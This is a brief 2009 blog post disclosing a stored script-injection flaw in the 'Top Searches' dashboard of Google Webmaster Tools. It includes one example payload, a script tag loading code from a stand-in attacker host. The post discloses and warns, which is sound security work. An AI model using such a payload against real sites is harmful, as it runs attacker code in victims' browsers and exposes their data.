Google Webmaster Tools Vulnerability

Sep1009Sep 10, 09

There is a vulnerability in Google Webmaster Tools that allows carefully crafted searches to inject arbitrary HTML content into the "Top Searches" dashboard. In the image below, an <hr /> element has been injected, but the HTML string could have been a script tag intended to breach the privacy of unsuspecting website owners.

If a number of people were to perform a Google search for <script src="http://hacker.com/bad.js"></script>, a site owner who loads the Webmaster Tools "Top Searches" page would unknowingly also be running the referenced script.

These types of oversights are common on the web, but I would have thought Google would be more careful!

About Jason Miller:

I am a JavaScript developer from Waterloo, Ontario, Canada. When I am not typing green code onto a black screen, you might find me at the nearest coffee pub checking out the brew. I run a internet firm called developIT and maintain blogs and web apps when I can.

Comments